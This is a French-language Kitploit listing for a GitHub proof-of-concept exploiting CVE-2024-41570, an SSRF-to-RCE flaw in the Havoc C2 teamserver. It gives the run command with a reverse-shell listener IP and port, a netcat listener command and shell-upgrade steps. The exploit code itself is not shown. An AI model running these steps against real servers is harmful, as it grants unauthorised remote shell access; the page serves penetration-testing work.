Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-41570 — Exploit automatisé de reverse shell via WebSocket | Havoc-C2-SSRF avec RCE | Kitploit
Outils/GitHubGitHub/diemoeve/cve-2024-41570
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à Distance
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

Exploit automatisé de reverse shell via WebSocket | Havoc-C2-SSRF avec RCE

Voir le dépôt
12214il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-41570 | SSRF Havoc C2 avec RCE | Exploit automatisé de reverse shell via WebSocket

Ce projet fournit un script de preuve de concept (PoC) en Python pour exploiter un service WebSocket vulnérable. Le script automatise l'enregistrement d'un agent, la livraison de la charge utile WebSocket et l'exécution de commandes à distance pour établir un reverse shell.

Fonctionnalités

  • Enregistre un agent sur le service cible.
  • Ouvre un WebSocket et envoie les charges utiles de handshake et d'authentification.
  • Exécute des commandes à distance via un reverse shell.
  • Fournit un flux de travail guidé avec des instructions claires.

Prérequis

  • Python 3.x installé sur votre machine.
  • Installez les dépendances requises en exécutant :
    root@kitploit:~
    pip install -r requirements.txt
    

Installation

  1. Clonez ce dépôt :
    root@kitploit:~
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. Accédez au répertoire du projet :
root@kitploit:~
cd CVE-2024-41570
  • Installez les dépendances :
    root@kitploit:~
    pip install -r requirements.txt
    
  • Utilisation

    Exécutez le script avec les arguments requis :

    root@kitploit:~
    python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
    

    Arguments

    • -t : URL cible du serveur WebSocket.
    • -i : Adresse IP du Team Server de Havoc.
    • -p : Port du Team Server de Havoc.
    • -U : Nom d'utilisateur pour l'authentification WebSocket.
    • -P : Mot de passe pour l'authentification WebSocket.
    • -l : IP du listener pour le reverse shell (votre machine).
    • -L : Port du listener pour le reverse shell (votre machine).

    Exemple de commande

    root@kitploit:~
    python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
    

    Étapes d'exécution

    1. Assurez-vous que le service cible est en cours d'exécution et vulnérable.
    2. Exécutez le script avec les paramètres requis.
    3. Dans un terminal séparé, démarrez un listener :
      root@kitploit:~
      nc -lvnp <listener_port>
      
    4. Améliorez le shell :
      root@kitploit:~
      python -c 'import pty; pty.spawn("/bin/bash")' 
      export TERM=xterm-256color
      stty rows 67 columns 318
      

    Dépendances

    Le script nécessite les bibliothèques Python suivantes :

    • requests
    • pycryptodome

    Installez-les en utilisant la commande :

    root@kitploit:~
    pip install -r requirements.txt
    

    Avis de sécurité

    Ce script est destiné uniquement à des fins éducatives. Assurez-vous d'avoir une autorisation explicite pour tester le système cible. Une mauvaise utilisation de ce script peut violer les lois et les directives éthiques.

    Références

    Inspiré par Default Havoc Poc

    Contribution

    Les contributions sont les bienvenues ! N'hésitez pas à forker le dépôt et à soumettre une pull request.

    Licence

    Ce projet est sous licence MIT. Voir le fichier LICENSE pour plus de détails.

    Télécharger l’outil